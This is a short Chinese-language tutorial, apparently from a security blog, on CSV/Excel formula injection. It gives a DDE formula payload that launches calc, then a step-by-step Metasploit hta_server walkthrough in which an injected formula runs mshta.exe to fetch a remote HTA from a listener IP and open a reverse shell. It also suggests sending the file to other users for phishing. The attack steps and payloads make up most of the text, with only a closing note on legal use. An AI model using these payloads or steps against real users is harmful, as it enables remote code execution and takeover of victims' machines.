漏洞介绍: CSV(逗号分隔值)注入是一种危险的攻击方式,可导致严重后果。攻击者利用这种漏洞向Excel文件中注入可执行或读取CSV文件的恶意载荷。当用户打开Excel文件时,文件将从CSV格式转换为原始的Excel格式,其中包括所有Excel提供的动态功能。在此过程中,CSV中的所有Excel公式都将执行,从而可能被滥用以允许执行恶意代码。
漏洞复现:
简易测试: 在Office的”文件->选项->信任中心”中启用”启用动态数据交换服务器启动”功能。
构造恶意载荷:
<code>=1+cmd|' /C calc'!A0</code>
这将在Excel中打开计算器。
模拟用户打开Excel文件,发现载荷成功执行并打开了计算器。
反弹Shell: 使用Metasploit框架实施攻击,成功上线。
具体步骤如下:
- 在Metasploit中使用
use exploit/windows/misc/hta_server
命令选择合适的模块。 - 使用
set srvhost 192.168.174.129
命令设置监听主机IP。 - 使用
exploit
命令启动监听器。 - 在Excel中插入恶意载荷:
=1+cmd|' /C mshta.exe http://192.168.174.129:8888/Agd7QT.hta'!A0
。 - 将包含恶意文件的Excel发送给其他用户。
- 当用户打开Excel文件时,成功反弹Shell并在Metasploit中成功上线。
文末小结: CSV注入通常出现在数据导出功能中,例如将表格数据导出到Excel。攻击者可以在导出的表格中插入恶意代码,使得用户再次打开Excel时触发恶意载荷执行。此外,CSV注入还可用于社会工程学钓鱼攻击,攻击者可以构造包含恶意代码的Excel文件,诱导受害者打开并执行恶意代码。在使用此漏洞进行攻击时,请务必确保遵守法律法规,仅在合法授权的环境中使用。
© 版权声明
THE END
暂无评论内容